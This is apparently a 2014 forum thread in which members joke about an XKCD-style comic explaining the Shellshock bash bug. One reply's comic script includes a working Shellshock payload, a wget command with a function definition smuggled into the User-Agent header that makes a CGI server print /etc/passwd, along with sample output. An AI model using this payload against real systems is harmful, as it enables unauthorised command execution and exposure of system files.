|
 |
On 26/09/14 21:14, Orchid Win7 v1 wrote:
> ....so, how long before we get a visual explanation of Shellshock, along
> the lines of the XKCD Heartbleed page? ;-)
Greetings, Andrew. We were worried about you (see the missing flower
thread),
In answer to your question, when we get someone capable of making good
graphic explanations (if that makes sense).
Volunteers?
John
--
Protect the Earth
It was not given to you by your parents
You hold it in trust for your children
Post a reply to this message
|
|
|
|
> ...so, how long before we get a visual explanation of Shellshock, along
> the lines of the XKCD Heartbleed page? ;-)
Draw your own stick figures:
Box 1:
Meg says: wget http://10.1.1.1/cgi-bin/test.cgi
Server thinks: User Meg is running wget 1.13.1 on Linux.
Box 2:
Server says: <html>
Box 3:
Meg says: wget -U "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101
Firefox/32.0" http://10.1.1.1/cgi-bin/test.cgi
Server thinks: User Meg is still running XP. LOL!
Box 4:
Server says: <html>
Box 5:
Meg says: Hmmm....
Box 6:
Meg says: wget -U "() { test;};echo \"Content-type: text/plain\"; echo;
echo; /bin/cat /etc/passwd" http://10.1.1.1/cgi-bin/test.cgi
Box 7:
Server says: root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:4:4:adm:/var/adm:/sbin/nologin
...
[Meg is furiously taking notes]
--
/*Francois Labreque*/#local a=x+y;#local b=x+a;#local c=a+b;#macro P(F//
/* flabreque */L)polygon{5,F,F+z,L+z,L,F pigment{rgb 9}}#end union
/* @ */{P(0,a)P(a,b)P(b,c)P(2*a,2*b)P(2*b,b+c)P(b+c,<2,3>)
/* gmail.com */}camera{orthographic location<6,1.25,-6>look_at a }
Post a reply to this message
|
|
